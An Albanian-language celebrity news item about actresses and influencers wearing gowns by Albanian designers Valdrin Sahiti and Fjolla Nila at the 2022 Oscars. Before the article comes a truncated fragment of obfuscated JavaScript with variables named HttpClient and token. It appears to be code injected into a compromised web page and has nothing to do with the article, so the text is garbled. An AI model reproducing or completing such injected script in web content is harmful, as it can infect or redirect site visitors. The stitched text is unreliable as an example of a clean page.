;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dy yje të tjerë shkëlqyen në tapetin e kuq të Oscars të veshur nga stilistë shqiptarë

By

Aktorja Tiffany Haddish ishte e ftuar në ceremoninë e ndarjes së çmimeve “Oscars 2022”, një ditë më parë.

Audienca shqiptare vuri në dukje se fustani i saj ishte i njëjtë me atë që ka veshur aktorja Monika Lubonja në një nga netët e spektaklit të “Big Brother VIP”.

Fustani është stiluar nga stilisti Valdrin Sahiti, i cili ishte i përzgjedhuri nga aktorja e famshme.

Fustani i Monikës nga Valdrin Sahiti ‘shkoi’ në Oscars

Aktorja nuk ishte e vetmja që zgjodhi Sahitin për fustanin e saj në një nga mbrëmjet më të glamuroze të vitit në botë.

Ylli i Youtube që është pjesë e rretheve të Listës A të Hollivudit, Anastasia Karanikolaou zgjodhi Sahitin për fustanin e saj të mbrëmjes.

Ndërkaq, modelja Jordyn Woods, e cila është edhe ish-shoqja e ngushtë Kylie Jenner, mori vëmendjen maksimale gjatë mbrëmjes, duke zgjedhur fustanin nga stilistja Fjolla Nila. /Prive.al

View this post on Instagram

A post shared by HEIR JORDYN (@jordynwoods)

Artikuj të ngjashëm